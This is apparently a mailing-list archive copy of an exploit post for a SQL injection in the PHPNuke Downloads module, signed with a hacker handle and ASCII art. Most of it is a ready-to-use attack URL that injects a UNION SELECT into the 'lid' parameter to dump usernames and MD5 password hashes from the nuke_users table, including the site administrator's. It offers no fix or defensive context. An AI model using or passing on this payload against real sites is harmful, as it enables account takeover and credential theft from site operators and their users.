[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHPNuke Module's Name Download SQL Injection Vulnerabilities

##################################################################
################################################################## 
#
#                       _ _ _ 
#                   .-"      "-.
#                  /            \
#                 |              |
#                 |,  .-.  .-.  ,|
#                 | )(_o/  \o_)( |      
#                 |/     /\     \|           
#       (@_       (_     ^^     _)
#  _     ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
#        )_/         \       / 
#       (@     
#
#            +-+-+-+-+-+-+-+-+-+-+
#             --+CrAzY CrAcKeR+--
#            +-+-+-+-+-+-+-+-+-+-+
#
#
################################################################## 
##################################################################
# Example:-
#  
#  [-] 
www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)
# 
# [-] Injection code.... ( 
-1+union+select+username,1,user_password,user_id+from+nuke_users )
#     
# [-] 
www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users
#     
# [-]  you see  now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend  A7eb Alwrd
####################################################################